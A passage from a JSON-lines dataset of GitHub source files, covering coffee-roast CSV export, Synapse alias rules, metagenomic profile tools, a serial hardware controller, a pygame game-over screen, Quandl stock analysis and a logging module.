'indexFirstCrackStart',\n 'indexFirstCrackEnd',\n 'indexSecondCrackStart',\n 'indexSecondCrackEnd',\n 'roastEndIndex',\n]\n\n#\n# Work around event naming inconsistencies.\n#\nevents = [\n ('roastStart', True),\n ('roastEnd', True),\n 
('YellowingStart', False),\n ('FirstCrackStart', False),\n ('FirstCrackEnd', False),\n ('SecondCrackStart', False),\n ('SecondCrackEnd', False),\n]\n\n\ndef get_event_field(event_name, prepend, field):\n return f'{event_name}{field.capitalize()}' if prepend else f'{field}{event_name}'\n\n\n#\n# Add computed event fields.\n#\nfor event_name, prepend in events:\n #\n # Fields for event times.\n #\n source_field = get_event_field(event_name, prepend, 'index')\n destination_field = get_event_field(event_name, prepend, 'seconds')\n roast_fields.append({'fields': [source_field], 'mapped_field': (destination_field, seconds_from_index) })\n\n #\n # Fields for event control values.\n #\n for control in codes_by_control.keys():\n source_field = get_event_field(event_name, prepend, 'index')\n destination_field = get_event_field(event_name, prepend, control)\n roast_fields.append({'fields': [source_field], 'mapped_field': (destination_field, make_get_control(control)) })\n\n #\n # Fields for event sample values.\n #\n for roast_sample_field in roast_sample_fields:\n source_field = get_event_field(event_name, prepend, 'index')\n destination_field = get_event_field(event_name, prepend, roast_sample_field)\n roast_fields.append({'fields': [roast_sample_field], 'mapped_field': (destination_field, make_get_sample(source_field)) })\n\n\ndef set_roast_column(roast_json, roast_columns, roast_field):\n if 'mapped_field' in roast_field:\n mapped_field, mapping_fn = roast_field['mapped_field']\n if 'fields' in roast_field:\n #\n # Map a source field (optionally involving arbitrary\n # data as specified in the mapping function).\n #\n for field in roast_field['fields']:\n if field in roast_json:\n roast_columns[mapped_field] = mapping_fn(roast_json, field)\n return\n else:\n #\n # Compute a value from arbitrary roast fields.\n #\n roast_columns[mapped_field] = mapping_fn(roast_json, None)\n\n sys.stderr.write(f'failed to retrieve data for {mapped_field}\\n')\n roast_columns[mapped_field] = None\n return\n \n roast_columns[roast_field] = roast_json.get(roast_field, None)\n\n\ndef create_roast(roast_json):\n roast = {}\n for roast_field in roast_fields:\n try:\n set_roast_column(roast_json, roast, roast_field)\n except:\n sys.stderr.write(f'an exception occurred while processing field {roast_field}')\n raise\n\n return roast\n\n\ndef load_roasts(roast_dirname):\n roasts = []\n for roast_filename in os.listdir(roast_dirname):\n roast_pathname = os.path.join(roast_dirname, roast_filename)\n sys.stderr.write(f'loading {roast_pathname}\\n')\n with open(roast_pathname, 'r', encoding='utf-8') as roast_file:\n roast_json = json.load(roast_file)\n roast = create_roast(roast_json)\n roasts.append(roast)\n \n return roasts\n\n\ndef get_fields():\n return [f if 'mapped_field' not in f else f['mapped_field'][0] for f in roast_fields]\n\n\ndef write_roasts(csv_file, roasts, fields):\n writer = csv.writer(csv_file)\n writer.writerow(fields)\n for roast in roasts:\n writer.writerow([roast[field] for field in fields])\n\n\ndef main():\n default_fields = ['date', 'time', 'beanId', 'weightGreen']\n valid_fields = ', '.join(get_fields())\n epilog = f'Valid field names are: {valid_fields}'\n\n parser = argparse.ArgumentParser(description='Convert RoasTime roast data to CSV.', epilog=epilog)\n parser.add_argument('-f', '--fields', help=f'comma-separated list of fields (default is {\",\".join(default_fields)})')\n parser.add_argument('output_file', metavar='PATH', help='CSV file name (default is stdout)', nargs='?')\n\n if 
sys.platform.startswith('linux'):\n config_path = os.environ.get('XDG_CONFIG_HOME', os.path.join(os.path.expanduser('~'), '.config'))\n elif sys.platform == 'darwin':\n config_path = os.path.join(os.path.expanduser('~'), 'Library', 'Application Support')\n elif sys.platform in ['win32', 'cygwin']:\n config_path = os.path.join(os.path.expanduser('~'), 'AppData', 'Roaming')\n else:\n raise NotImplementedError(f'platform {sys.platform} is not supported')\n\n args = parser.parse_args()\n roast_path = os.path.join(config_path, 'roast-time', 'roasts')\n roasts = load_roasts(roast_path)\n fields = default_fields if args.fields is None else args.fields.split(',')\n file_id = sys.stdout.fileno() if args.output_file is None else args.output_file\n with open(file_id, 'w', newline='') as csv_file:\n write_roasts(csv_file, roasts, fields)\n\n\nif __name__ == '__main__':\n rv = main()\n sys.exit(rv)\n","repo_name":"jglogan/roastime-data","sub_path":"dump_roasts.py","file_name":"dump_roasts.py","file_ext":"py","file_size_in_byte":8747,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"95"} +{"seq_id":"18937201679","text":"from synapse.util import glob_to_regex\n\nfrom ._base import Config, ConfigError\n\n\nclass RoomDirectoryConfig(Config):\n def read_config(self, config):\n alias_creation_rules = config[\"alias_creation_rules\"]\n\n self._alias_creation_rules = [\n _AliasRule(rule)\n for rule in alias_creation_rules\n ]\n\n def default_config(self, config_dir_path, server_name, **kwargs):\n return \"\"\"\n # The `alias_creation` option controls who's allowed to create aliases\n # on this server.\n #\n # The format of this option is a list of rules that contain globs that\n # match against user_id and the new alias (fully qualified with server\n # name). 
The action in the first rule that matches is taken, which can\n # currently either be \"allow\" or \"deny\".\n #\n # If no rules match the request is denied.\n alias_creation_rules:\n - user_id: \"*\"\n alias: \"*\"\n action: allow\n \"\"\"\n\n def is_alias_creation_allowed(self, user_id, alias):\n \"\"\"Checks if the given user is allowed to create the given alias\n\n Args:\n user_id (str)\n alias (str)\n\n Returns:\n boolean: True if user is allowed to crate the alias\n \"\"\"\n for rule in self._alias_creation_rules:\n if rule.matches(user_id, alias):\n return rule.action == \"allow\"\n\n return False\n\n\nclass _AliasRule(object):\n def __init__(self, rule):\n action = rule[\"action\"]\n user_id = rule[\"user_id\"]\n alias = rule[\"alias\"]\n\n if action in (\"allow\", \"deny\"):\n self.action = action\n else:\n raise ConfigError(\n \"alias_creation_rules rules can only have action of 'allow'\"\n \" or 'deny'\"\n )\n\n try:\n self._user_id_regex = glob_to_regex(user_id)\n self._alias_regex = glob_to_regex(alias)\n except Exception as e:\n raise ConfigError(\"Failed to parse glob into regex: %s\", e)\n\n def matches(self, user_id, alias):\n \"\"\"Tests if this rule matches the given user_id and alias.\n\n Args:\n user_id (str)\n alias (str)\n\n Returns:\n boolean\n \"\"\"\n\n # Note: The regexes are anchored at both ends\n if not self._user_id_regex.match(user_id):\n return False\n\n if not self._alias_regex.match(alias):\n return False\n\n return True\n","repo_name":"Jd8111997/ChatClub","sub_path":"synapse/config/room_directory.py","file_name":"room_directory.py","file_ext":"py","file_size_in_byte":2529,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"5562841789","text":"# Напишите функцию double power (double a, int n), вычисляющую значение a^n.\ndef power(a, n):\n s = 1\n for i in range(n):\n s *= a\n return s\n\n\na = input().split()\n# for i in range(len(a)):\n# a[i] = int(a[i])\n\nprint(int(power(float(a[0]), int(a[1]))))\n","repo_name":"Renittka/Web_2020","sub_path":"week8/problems/informatics/functions/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"3143848662","text":"# This is a collection of scripts that will allow manipulation of CAMI profiling files\nimport copy\nimport logging\nfrom abc import ABC, abstractmethod\n\n\nclass ProfileABC(ABC):\n def __init__(self, sample_metadata=None, profile=None):\n self.sample_metadata = sample_metadata\n self.profile = profile\n self._data = dict()\n # Stick in the root node just to make sure everything is consistent\n self._data[\"-1\"] = dict()\n self._data[\"-1\"][\"rank\"] = None\n self._data[\"-1\"][\"tax_path\"] = list()\n self._data[\"-1\"][\"tax_path_sn\"] = list()\n self._data[\"-1\"][\"abundance\"] = 0\n self._data[\"-1\"][\"descendants\"] = list()\n self._header = list()\n self._tax_id_pos = None\n self._rank_pos = None\n self._tax_path_pos = None\n self._tax_path_sn_pos = None\n self._abundance_pos = None\n self._eps = .0000000000000001 # This is to act like zero, ignore any lines with abundance below this quantity\n self._all_keys = [\"-1\"]\n self._merged_flag = False\n\n @staticmethod\n def get_branch_length_function(function_str):\n try:\n return eval(function_str)\n except SyntaxError as exception:\n logging.getLogger('opal').warning('Invalid function provided with -b, --branch_length_function: {}. 
lambda x: 1/x will be used.'.format(exception.msg))\n return eval('lambda x: 1/float(x)')\n\n @abstractmethod\n def parse_file(self):\n pass\n\n def write_file(self, out_file_name=None):\n if out_file_name is None:\n raise Exception\n _data = self._data\n keys = _data.keys()\n # This will be annoying to keep things in order...\n # Let's iterate on the length of the tax_path since we know that will be in there\n tax_path_lengths = max([len(_data[key][\"tax_path\"]) for key in keys])\n fid = open(out_file_name, 'w')\n # Write the header\n for head in self._header:\n fid.write(\"%s\\n\" % head)\n\n # Loop over length of tax_path and write data\n # always make the output tax_id, rank, tax_path, tax_path_sn, abundance in that order\n for path_length in range(1, tax_path_lengths + 1):\n for key in keys:\n if len(_data[key][\"tax_path\"]) == path_length and _data[key][\"abundance\"] > self._eps:\n line_data = _data[key]\n fid.write(\"%s\\t\" % key)\n if self._rank_pos is not None:\n fid.write(\"%s\\t\" % line_data[\"rank\"])\n fid.write(\"%s\\t\" % \"|\".join(line_data[\"tax_path\"]))\n if self._tax_path_sn_pos is not None:\n fid.write(\"%s\\t\" % \"|\".join(line_data[\"tax_path_sn\"]))\n fid.write(\"%f\\n\" % line_data[\"abundance\"])\n fid.close()\n return\n\n def _subtract_down(self):\n # helper function to push all the weights up by subtracting\n # NOTE: when subtracting, need to start at root and go down\n # NOTE: when adding, need to start at leaves and go up\n _data = self._data\n keys = _data.keys()\n # This will be annoying to keep things in order...\n # Let's iterate on the length of the tax_path since we know that will be in there\n tax_path_lengths = max([len(_data[key][\"tax_path\"]) for key in keys])\n for path_length in range(1, tax_path_lengths): # eg tax_path_lengths = 5, use 1,2,3,4 since we stop at leaves\n for key in keys:\n if len(_data[key][\"tax_path\"]) == path_length:\n descendants = _data[key][\"descendants\"] # get all descendants\n for descendant in descendants:\n _data[key][\"abundance\"] -= _data[descendant][\"abundance\"] # subtract the descendants abundance\n\n def _add_up(self):\n # helper function to push all the weights up by subtracting\n # NOTE: when subtracting, need to start at root and go down\n # NOTE: when adding, need to start at leaves and go up\n _data = self._data\n keys = _data.keys()\n # This will be annoying to keep things in order...\n # Let's iterate on the length of the tax_path since we know that will be in there\n tax_path_lengths = max([len(_data[key][\"tax_path\"]) for key in keys])\n for path_length in range(tax_path_lengths, 1,\n -1): # eg tax_path_lengths = 5, use 5,4,3,2, since we stop at roots\n for key in keys:\n if len(_data[key][\"tax_path\"]) == path_length:\n ancestor = _data[key][\"ancestor\"]\n if ancestor in _data: # don't do anything if this is a/the root node\n _data[ancestor][\"abundance\"] += _data[key][\"abundance\"] # add the descendants abundance\n\n def normalize(self):\n # Need to really push it up while subtracting, then normalize, then push up wile adding\n # self._push_up(operation=\"subtract\")\n self._subtract_down()\n _data = self._data\n keys = _data.keys()\n total_abundance = 0\n for key in keys:\n total_abundance += _data[key][\"abundance\"]\n # print(total_abundance)\n for key in keys:\n if total_abundance > 0:\n _data[key][\"abundance\"] /= total_abundance\n _data[key][\"abundance\"] *= 100 # make back into a percentage\n # self._push_up(operation=\"add\")\n self._add_up()\n return\n\n def merge(self, 
other):\n # Warning: not checking for taxonomic consistency\n if not isinstance(other, ProfileABC):\n print(\"Only works with other Profiles\")\n raise Exception\n if self._merged_flag is False:\n self._header.insert(0, \"# This is a merged file, ignore files in headers below\")\n self._merged_flag = True\n _data = self._data\n _other_data = other._data\n other_keys = _other_data.keys()\n for key in other_keys:\n if key in _data:\n _data[key][\"abundance\"] += _other_data[key][\"abundance\"] # if already in there, add abundances\n else:\n _data[key] = copy.copy(_other_data[key]) # otherwise use the whole thing\n\n @abstractmethod\n def make_unifrac_input_and_normalize(self, other):\n pass\n","repo_name":"CAMI-challenge/OPAL","sub_path":"cami_opal/utils/ProfilingToolsABC.py","file_name":"ProfilingToolsABC.py","file_ext":"py","file_size_in_byte":6378,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"95"} +{"seq_id":"22187996824","text":"import glob\nimport logging as logger\nfrom itertools import chain\nimport sys\nimport time\nfrom queue import Queue\nfrom threading import Lock, Thread\n\nimport serial\nfrom serial.tools import list_ports\n\nfrom .status_handler import Status, StatusHandler\nfrom .task_models import Task\n\nfrom .backend_connector import BackendConnector, MetricsData\n\nSTATE_UP = 0\n\nvidpid_pairs = set(\n [\n (0x2341, 0x43), # Arduino Uno R3\n (0x1A86, 0x7523), # CH340\n (0x1A86, 0x7522), # CH340\n (0x1A86, 0x5523), # CH341 in serial mode\n (0x1A86, 0x7584), # CH340S\n ]\n)\n\n\nclass WriterThread(Thread):\n statusHandler: StatusHandler\n message_queue: Queue\n port: serial.Serial = None\n is_running: bool = True\n last_ask_timestamp: int = 0\n ask_period: int = 5 # every n seconds send '?' char to request current status. 
Do it in pseudo-async way\n\n def __init__(self, statusHandler: StatusHandler, askperiod: int = 5):\n super(WriterThread, self).__init__()\n self.statusHandler = statusHandler\n self.message_queue = Queue()\n self.ask_period = askperiod\n\n def set_serial_port(self, serialport: serial.Serial):\n self.port = serialport\n\n def stop(self):\n self.is_running = False\n\n def send(self, message: str):\n msg = message.encode(\"ascii\")\n if message[-2:] != \"\\r\\n\":\n msg += \"\\r\\n\".encode(\"ascii\")\n self.message_queue.put(msg)\n\n def run(self):\n\n while self.is_running:\n\n try:\n msg = self.message_queue.get(block=True, timeout=self.ask_period)\n self.port.write(msg)\n except Exception as e:\n # here we should suppress Empty exception and handle all the others\n # logger.debug(f\"There was some error while sending a message: {e}\")\n pass\n\n if int(time.time()) - self.last_ask_timestamp >= self.ask_period:\n self.send(\n \"?\\r\\n\"\n ) # According to the protocol, question mark is requesting a report of the current status of every component\n self.last_ask_timestamp = int(time.time())\n\n\nclass HardwareCommunicator(Thread):\n statusHandler: StatusHandler\n writerThread: WriterThread\n backendConnector: BackendConnector\n port: serial.Serial = None\n baudrate: int = 115200 # fallback to default value\n is_running: bool = True\n status_report_lock: Lock = Lock()\n\n def __init__(self, backendConnector, statusHandler, arguments, *args):\n super(HardwareCommunicator, self).__init__()\n self.statusHandler = statusHandler\n self.baudrate = arguments.baudrate\n self.backendConnector = backendConnector\n\n self.writerThread = WriterThread(statusHandler, arguments.interval)\n\n self.status_report = {\n \"containers\": {\n \"C1\": None, # (float_switch_up [0 or 1], pressure [hPa])\n \"C2\": None,\n \"C3\": None,\n \"C4\": None,\n \"C5\": None,\n },\n \"ref_pressure\": 0.0, # only pressure\n \"pumps\": {\n \"P1\": None, # (current [A], voltage [V])\n \"P2\": None,\n \"P3\": None,\n \"P4\": None,\n },\n \"valves\": {\n \"V1\": None,\n \"V2\": None,\n \"V3\": None,\n },\n }\n\n def open_serial_port(self):\n sport = None\n\n for port in list(list_ports.comports()):\n if port.vid and port.pid:\n if (port.vid, port.pid) in vidpid_pairs:\n print(f\"Found a serial port. Location: {port.device}\")\n sport = port.device\n break\n\n if not sport:\n logger.error(\"No valid COM port was found. 
Check your USB device.\")\n self.statusHandler.setStatus(Status(500, \"No valid COM port was found.\"))\n\n try:\n self.port = serial.Serial(sport, self.baudrate, timeout=2)\n self.writerThread.set_serial_port(self.port)\n self.writerThread.start() # start writer thread\n self.statusHandler.setStatus(\n Status(200, \"Serial port opened successfully.\")\n )\n except:\n logger.error(f\"Can't open serial port {sport}\")\n self.statusHandler.setStatus(Status(500, f\"Can't open serial port {sport}\"))\n\n def stopAllComponents(self):\n comps = chain.from_iterable([list(self.status_report[\"pumps\"].keys()), list(self.status_report[\"valves\"].keys())])\n for c in comps:\n command = f\"SET {c} OFF\"\n logger.debug(f\"Sending command: {command}\")\n self.send(command)\n logger.debug(\"Everything should be OFF by now.\")\n\n def processTask(self, task: Task):\n\n if task.target == 'stop' and task.action == 'stop':\n self.stopAllComponents()\n return\n\n command = f'SET {task.target} {\"ON\" if task.value==1.0 else \"OFF\"}'\n\n self.send(command)\n\n def send(self, message: str):\n self.writerThread.send(message)\n\n def stop(self):\n logger.debug(\"Shutting down hardware communication thread...\")\n self.writerThread.stop()\n self.writerThread.join()\n self.is_running = False\n\n def parse_debug_message(self, line: str):\n if \"FAIL\" in line:\n self.statusHandler.setStatus(Status(503, line))\n return\n\n if \"REPORT\" in line and \"FINISHED\" in line:\n self.status_report_lock.acquire()\n\n metrics = list(chain.from_iterable(chain.from_iterable([list(x.values()) if type(x)==dict else [[x]] for x in self.status_report.values()])))\n #logger.debug(f\"Metrics: {metrics}\")\n try:\n self.backendConnector.push_metrics(metrics)\n except Exception as e:\n logger.error(f\"Error while sending the metrics: {e}\")\n self.status_report_lock.release()\n\n def set_pump_details(self, id: str, first_value: str, second_value: str):\n logger.debug(f\"Got pump setting: {id} {first_value} {second_value}\")\n self.status_report[\"pumps\"][id[1:]] = (MetricsData(measurement=\"current\", field=id[1:], value=float(first_value)), MetricsData(measurement=\"voltage\", field=id[1:], value=float(second_value)))\n\n def set_valve_details(self, id: str, first_value: str, second_value: str):\n logger.debug(f\"Got valve setting: {id} {first_value} {second_value}\")\n self.status_report[\"valves\"][id[1:]] = (MetricsData(measurement=\"current\", field=id[1:], value=float(first_value)), MetricsData(measurement=\"voltage\", field=id[1:], value=float(second_value)))\n\n def set_container_details(self, id: str, first_value: str, second_value: str):\n logger.debug(f\"Got container setting: {id} {first_value} {second_value}\")\n if id == \"$RF\":\n self.status_report[\"ref_pressure\"] = MetricsData(measurement=\"pressure\", field=\"reference\", value=float(second_value)) # float(second_value)\n return\n self.status_report[\"containers\"][id[1:]] = (MetricsData(measurement=\"float_switch_up\", field=id[1:], value=1.0-float(first_value)), MetricsData(measurement=\"pressure\", field=id[1:], value=float(second_value)))\n\n def parse_value_message(self, line: str):\n \"\"\"\n format of the message: $Cx 0 1023.28 - report of a container status, first number tells whether float switch is up or down (by default, 1-down, 0-up), second: pressure in a container\n $Px 0.00 0.00 - report of a pump status, first number: current flowing through the component, second: voltage\n $Vx 0.00 0.00 - report of a valve status, first number: current flowing 
through the component, second: voltage\n \"\"\"\n\n self.status_report_lock.acquire()\n\n {\n \"C\": self.set_container_details,\n \"R\": self.set_container_details,\n \"P\": self.set_pump_details,\n \"V\": self.set_valve_details,\n }[line[1]](*(line.split(\" \")))\n\n self.status_report_lock.release()\n\n def parse_line(self, line: bytes):\n \"\"\"\n Parse pure message straight from the serial port. It should be an ascii-encoded bytes object.\n \"\"\"\n if len(line) < 1:\n return\n decoded = line.decode(\"ascii\").replace(\"\\r\", \"\").replace(\"\\n\", \"\")\n if \"Water\" in decoded:\n logger.debug(\n f\"Got the hello message. We are good to go. Protocol version: {decoded.split(' ')[-1]}\"\n )\n return\n # logger.debug(f\"Get line: {decoded}\")\n try:\n {\">\": self.parse_debug_message, \"$\": self.parse_value_message}[decoded[0]](\n decoded\n )\n except Exception as e:\n logger.debug(f\"Unrecognized command: {decoded}\")\n\n def run(self):\n\n self.open_serial_port()\n\n line = b\"\"\n\n while self.is_running:\n\n if self.port.is_open:\n c = self.port.read(1)\n line += c\n if len(line) > 1 and (\n line[-2:].decode(\"ascii\") == \"\\r\\n\" or line[-1] == b\"\\n\"\n ):\n self.parse_line(line)\n line = b\"\"\n else:\n time.sleep(3) # avoid spinning the loop constantly\n\n \n","repo_name":"WaterTreatmentLab/connector","sub_path":"src/connector/communication.py","file_name":"communication.py","file_ext":"py","file_size_in_byte":9453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"42900477648","text":"# CS 3100 Team 8\n# Spring 2021\n#\n# This file contains the functions needed to display the game over screen after a\n# session is completed. If the final score of the game is a new high score, it\n# will prompt the user to enter their name and add the score to the database.\n\nimport pygame as pg\nimport sys\nfrom button import Button\nimport leaderboard as lb\nfrom inputbox import InputBox\n\ndef show_game_over(window, score):\n\t# Button colors\n\tlight_color = (\"#50dbd4\")\t# light teal\n\tdark_color = (\"#27aca5\")\t# dark teal\n\n\t# Store the width and height of the window\n\ts_width = window.get_width()\n\ts_height = window.get_height()\n\n\t# Define button dimensions\n\tbutton_width = 600\n\tbutton_height = 60\n\n\t# Define the game over screen dimensions and position\n\tg_width = 380\n\tg_height = 600\n\tg_x = (s_width - g_width) / 2\n\tg_y = (s_height - g_height) / 2\n\tg_radius = 30\n\n\t# Load game over image and determine placement position\n\timg = pg.image.load(\"game_over_round.png\")\n\timg_width = img.get_width()\n\timg_pos = (g_x+4, g_y+4)\n\timg_small = pg.transform.scale(img, (g_width-8, g_height-8))\n\n\t# Create the QUIT button in the bottom left corner\n\tquit_pos = (10, s_height - button_height - 10)\n\tquit_button = Button(quit_pos, button_width/2, button_height, text='EXIT GAME')\n\n\t# Create the BACK button in the bottom right corner\n\tback_pos = (s_width - button_width/2 - 10, s_height - button_height - 10)\n\tback_button = Button(back_pos, button_width/2, button_height, text='BACK')\n\n\t# Create the PLAY AGAIN button on the game over screen\n\tplay_again_pos = (g_x + (g_width - button_width/2)/2, g_y + (g_height - 100))\n\tplay_again_button = Button(play_again_pos, button_width/2, button_height, text='PLAY AGAIN')\n\n\t# List of all buttons on this window\n\tbutton_list = [quit_button, back_button, play_again_button]\n\n\t# Retrieve the top ten scores to be placed in the table\n\ttable_data = 
lb.return_top_ten()\n\t# print(table_data)\n\n\t# Define a text box for the user's name\n\tbox_w = 300\n\tbox_h = 60\n\t# InputBox(x, y, w, h)\n\tname_box = InputBox(g_x + (g_width - box_w)/2, g_y + (g_height - 450), box_w, box_h)\n\tinput_boxes = [name_box]\n\n\t### MENU LOOP ###\n\trunning = True\n\twhile running:\n\t\t# Store the current mouse coordinates\n\t\tmouse = pg.mouse.get_pos()\n\n\t\t# Loop through all events\n\t\tfor event in pg.event.get():\n\t\t\t# If a quit event is found, then exit the application\n\t\t\tif event.type == pg.QUIT:\n\t\t\t\t# Exit application\n\t\t\t\tsys.exit()\n\n\t\t\t# If the mouse is clicked\n\t\t\tif event.type == pg.MOUSEBUTTONDOWN:\n\t\t\t\t# If the mouse is positioned over the QUIT button\n\t\t\t\tif quit_button.is_over(mouse):\n\t\t\t\t\t# Exit application\n\t\t\t\t\tsys.exit()\n\t\t\t\t\n\t\t\t\t# If the mouse is positioned over the BACK button\n\t\t\t\tif back_button.is_over(mouse):\n\t\t\t\t\trunning = False\n\t\t\t\t\tbreak\n\n\t\t\t\t# If mouse is over play again, then launch another game session\n\t\t\t\tif play_again_button.is_over(mouse):\n\t\t\t\t\trunning = False\n\t\t\t\t\treturn True\n\n\t\t\t# Handle input box events\n\t\t\tfor box in input_boxes:\n\t\t\t\toutput = box.handle_event(event)\n\t\t\t\tif output != \"\":\n\t\t\t\t\tprint(\"Submission received:\", output, \"/\", score)\n\t\t\t\t\tlb.add_entry(output, score)\n\n\t\t# Create a rectangle to outline the game over screen\n\t\tpg.draw.rect(window, \"black\", (g_x, g_y, g_width, g_height), border_radius=g_radius)\n\t\twindow.blit(img_small, img_pos)\n\n\t\t# Draw the GAME OVER text\n\t\ttext = \"GAME OVER\"\n\t\tfont = pg.font.SysFont('freesansbold.ttf', 64)\n\t\tlabel = font.render(text, 1, \"white\")\n\t\twindow.blit(label, (g_x + 50, g_y + 40))\n\n\t\t# Draw the Final Score text\n\t\ttext = \"Final Score: \" + str(int(score))\n\t\tfont = pg.font.SysFont('freesansbold.ttf', 32)\n\t\tlabel = font.render(text, 1, \"white\")\n\t\twindow.blit(label, (g_x + 50, g_y + 100))\n\n\t\t# Draw the buttons one at a time, checking if mouse is hovering\n\t\tfor button in button_list:\n\t\t\t# Highlight buttons when moused over\n\t\t\tif button.is_over(mouse):\n\t\t\t\t\tbutton.draw(window, light_color)\n\t\t\telse:\n\t\t\t\tbutton.draw(window, dark_color)\n\n\t\t# Draw the input box\n\t\tfor box in input_boxes:\n\t\t\tbox.draw(window)\n\n\t\t# Updates the frame\n\t\tpg.display.update()\n\n\treturn False","repo_name":"tmorgan181/Space_Blocks","sub_path":"game_over.py","file_name":"game_over.py","file_ext":"py","file_size_in_byte":4037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"2230335423","text":"import argparse\nimport json\nimport quandl\nimport pandas as pd\n\nimport stock_constants\n\nquandl.ApiConfig.api_key = \"s-GMZ_xkw6CrkGYUWs1p\"\n\n\ndef fetch_stock_data(stock, show_profits, show_volume, show_bad_days):\n \"\"\" Fetch and print data about a stock. 
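Depending on the show_* flags, also reports the most profitable day, days with volume more than 10% above average, and the number of days that closed below their open.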
\"\"\"\n print(\"Data for stock ticker:\", stock)\n stock_data = get_stock_data(stock,\n stock_constants.START_DATE,\n stock_constants.END_DATE)\n\n display_basic_stock_data(stock_data)\n if show_profits:\n print(get_max_daily_profit(stock_data))\n if show_volume:\n print(get_high_volume_days(stock_data))\n if show_bad_days:\n print(\"Number of bad days: {} for the analysis period\".format(\n get_bad_days(stock_data)))\n\n\ndef display_basic_stock_data(stock_data):\n \"\"\" Print stock data for each month of the analysis period.\n Data displayed:\n (start_date, end_date, average_closing_price, average_opening_price)\n \"\"\"\n print(\"Basic Stock Data for each month between Jan and July 2017:\")\n year = 2017\n for month in range(1, 7):\n month_data = fetch_monthly_data(stock_data, year, month)\n average_close = float(month_data[['close']].mean())\n average_open = float(month_data[['open']].mean())\n print(json.dumps(\n {stock_constants.START_DATE_KEY: create_first_of_month_timestamp(year, month),\n stock_constants.END_DATE_KEY: create_first_of_month_timestamp(year, month + 1),\n stock_constants.AVG_CLOSE_KEY: average_close,\n stock_constants.AVG_OPEN_KEY: average_open},\n sort_keys=True,\n indent=4))\n\n\ndef fetch_monthly_data(stock_data, year, month):\n \"\"\" Filters and returns a single month's data from the complete dataset passed in. \"\"\"\n pandas_dates = pd.to_datetime(stock_data['date'])\n start_date_prefix = create_first_of_month_timestamp(year, month)\n end_date_prefix = create_first_of_month_timestamp(year, month + 1)\n return stock_data[(pandas_dates < end_date_prefix) & (pandas_dates >= start_date_prefix)]\n\n\ndef create_first_of_month_timestamp(year, month):\n \"\"\" Creates a string timestamp of the first day of the month of the form:\n year-month-01\n\n Where the month is zero padded if it is a single digit month.\n\n >>> create_first_of_month_timestamp(2014, 1)\n '2014-01-01'\n >>> create_first_of_month_timestamp(1000, 12)\n '1000-12-01'\n \"\"\"\n zero_prefix = \"0\" if month < 10 else \"\"\n return \"{}-{}{}-01\".format(year, zero_prefix, month)\n\n\ndef get_max_daily_profit(stock_data):\n \"\"\" Get the most profitable day of the analysis period. \"\"\"\n if stock_data.empty:\n raise ValueError(\"Stock data cannot be empty\")\n print(\"Displaying the most profitable day:\")\n stock_data['profit'] = stock_data.apply(lambda row: row['high'] - row['low'], axis=1)\n most_profitable_day = stock_data.loc[stock_data['profit'].idxmax()]\n return most_profitable_day[['date', 'ticker', 'high', 'low', 'profit']]\n\n\ndef get_high_volume_days(stock_data):\n if stock_data.empty:\n raise ValueError(\"Stock data cannot be empty\")\n \"\"\" get the rows of the analysis period with a volume 10% above the average volume. \"\"\"\n print(\"Displaying days which had volumes exceeding 10% of the average volume for the period:\")\n avg_volume = stock_data['volume'].mean()\n high_volume_mark = (1 + stock_constants.HIGH_VOLUME_THRESHOLD) * avg_volume\n high_days = stock_data[stock_data['volume'] > high_volume_mark]\n print(\"Avg volume: \" + str(avg_volume))\n print(\"High volume days:\")\n return high_days[['ticker', 'date', 'volume']]\n\n\ndef get_bad_days(stock_data):\n if (stock_data.empty):\n raise ValueError(\"Stock data cannot be empty\")\n \"\"\" Return the number of days in the analysis period which had a closing price lower than the opening price. 
\"\"\"\n print(\"Displaying Number of 'Losing' days\")\n bad_days = stock_data[stock_data['close'] < stock_data['open']]\n return bad_days.shape[0]\n\n\ndef get_stock_data(stock, start_date, end_date):\n \"\"\" Make a request to quandl to fetch stock data for a single stock for a period of time \"\"\"\n return quandl.get_table(\n stock_constants.TABLE_NAME,\n ticker=stock,\n date={'gte': stock_constants.START_DATE, 'lte': stock_constants.END_DATE})\n\n\ndef create_parser():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--stocks\",\n default='COF,GOOGL,MSFT',\n help=\"A comma separated list of ticker symbols to run the analysis on. \" +\n \"Default is `COF,GOOGL,MSFT`.\")\n parser.add_argument(\"--max-daily-profit\",\n help=\"Adds output which specifies the day in the analysis which would have \" +\n \"provided the highest gain for each security.\",\n action=\"store_true\")\n parser.add_argument(\"--busy-day\",\n help=\"Adds output which specifies the day in the analysis during which volume \" +\n \"was 10 percent higher than average for each security.\",\n action=\"store_true\")\n parser.add_argument(\"--biggest-loser\",\n help=\"Adds output which specifies the security which had the most days where \" +\n \"the closing price was lower than the opening price.\",\n action=\"store_true\")\n return parser\n\n\ndef main():\n parser = create_parser()\n args = parser.parse_args()\n for ticker in args.stocks.split(','):\n fetch_stock_data(ticker, args.max_daily_profit, args.busy_day, args.biggest_loser)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"maxwolffe/QuandlTest","sub_path":"stock_data.py","file_name":"stock_data.py","file_ext":"py","file_size_in_byte":5745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"26719788706","text":"\nimport os\nimport sys\nimport logging\nimport tempfile\nimport time\nfrom logging import FileHandler\n\nformatters = [logging.Formatter(\"%(asctime)s :: %(threadName)s :: %(module)s :: %(funcName)s :\\n\"\n \" %(levelname)s :: %(msg)s\"), # WARNING, INFO\n logging.Formatter(\"%(asctime)s :: %(module)s :: %(funcName)s :\\n %(levelname)s :: %(msg)s\"),\n logging.Formatter(\"%(module)s :: %(funcName)s :: %(levelname)s :: %(msg)s\"), # DEBUG\n logging.Formatter(\"%(asctime)s :: %(levelname)s :: %(msg)s\"),\n logging.Formatter(\"%(levelname)s :: %(msg)s\")] # Console\n\n\nclass PersonalizedLogger(logging.Logger):\n\n CRITICAL = logging.CRITICAL # 50\n FATAL = logging.FATAL # 50\n ERROR = logging.ERROR # 40\n 